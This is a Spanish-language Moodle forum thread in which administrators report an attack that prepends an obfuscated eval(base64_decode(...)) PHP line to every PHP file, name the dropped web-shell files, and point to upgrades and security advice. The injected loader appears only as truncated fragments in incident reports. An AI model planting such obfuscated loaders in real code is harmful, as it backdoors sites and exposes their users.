CUIDADO!!!!....Ataque de inserción código malicioso en Moodle

CUIDADO!!!!....Ataque de inserción código malicioso en Moodle

de Ricardo Barrientos Burgué -
Número de respuestas: 3
Estimados:

Mediente el presente mensaje, quisiera reportar un ATAQUE de inserción de código malicioso en nuestra plataforma Moodle.

Al comienzo de todos los archivos del tipo PHP de moodle, se encuentra inserto el siguiente código:

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvY.......CdkZ29iaCcpO319fQ==')); ?>

Adicionalmente en el mismo servidor, se encuentra instalado el Software Joomla y también los archivos PHP poseen el coódigo mencionado anteriormente.

Todos los archivos PHP de Moodle se encuentan con fecha de modificación 09/02/09.

En Internet he encontrado el siguiente artículo que menciona el ataque en cuestión:

- http://www.lobosoft.es/2008/08/06/sufrimos-un-nuevo-ataque-xss/

Saludos a todos..

Ricardo
Promedio de valoraciones: -
En respuesta a Ricardo Barrientos Burgué

Re: CUIDADO!!!!....Ataque de inserción código malicioso en Moodle

de Jose García | Nosolored -
Imagen de Moodlers de gran ayuda
Buenos días, Ricardo.

También nos estamos encontrando en versiones no actualizadas de Moodle (anteriores a 1.9.4, 1.8.8, 1.7.7 y 1.6.9) los archivos siguientes:

s.php
dg.php
mdl_utf.php

los cuáles son utilizados para llenar los foros de mensajes basura y algunos de ellos son php shell con funciones avanzadas de creación de directorios, acceso a base de datos, etc.

Estos archivos no se han localizado en versiones actualizadas de Moodle.

La solución más rápida por tanto, es la de actualizar a versiones seguras de Moodle y realizar un análisis forense de los accesos y limpiado los rastros que haya podido dejar en el aula Moodle.

P.D. No publicamos el código de esos 3 archivos (salvo que nos lo pidan Administradores de Moodle) por seguridad, ya que pueden ser utilizados de forma indebida.

Un saludo.

Jose García
Promedio de valoraciones: -
En respuesta a Jose García | Nosolored

Re: CUIDADO!!!!....Ataque de inserción código malicioso en Moodle

de David Vesperinas -

Hola compañeros... llevo un año empleando la plataforma Moodle.. y no había tenido ningún problema... hasta hace un par de días.... no se veían las imágenes de mis cursos ni se podían abrir los archivos incluidos. Enredando el los archivos PHP me he encontrado el siguiente código

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3

etc....

Vamos tal y como comentaís... parece ser que he sido víctima de un ataque... mi versión es 1.8...¿qué puedo hacer para solucionar el asunto? ¿Instalar un versión superior? ¿Y mis cursos? ¿Qué pasará con ellos?

Un saludo y muchas gracias

Promedio de valoraciones: -
En respuesta a David Vesperinas

Re: CUIDADO!!!!....Ataque de inserción código malicioso en Moodle

de Wenceslao Fernández -
Hola David sonrisa

Las versiones 1.8 parecen que son el blanco preferido de los lammers. Me temo que si no estás actualizado a la última versión 1.8.9 tu sistema corre serio peligro.

Conversaciones recientes que tratan el tema y su solución, dependiendo de que la BD haya sido infectada o no:

http://moodle.org/mod/forum/discuss.php?d=130905#p572913
http://moodle.org/mod/forum/discuss.php?d=129352#p566729

Recomendaciones de seguridad básicas:

http://moodle.org/mod/forum/discuss.php?d=129520#p567200

Salu2

W

Promedio de valoraciones: -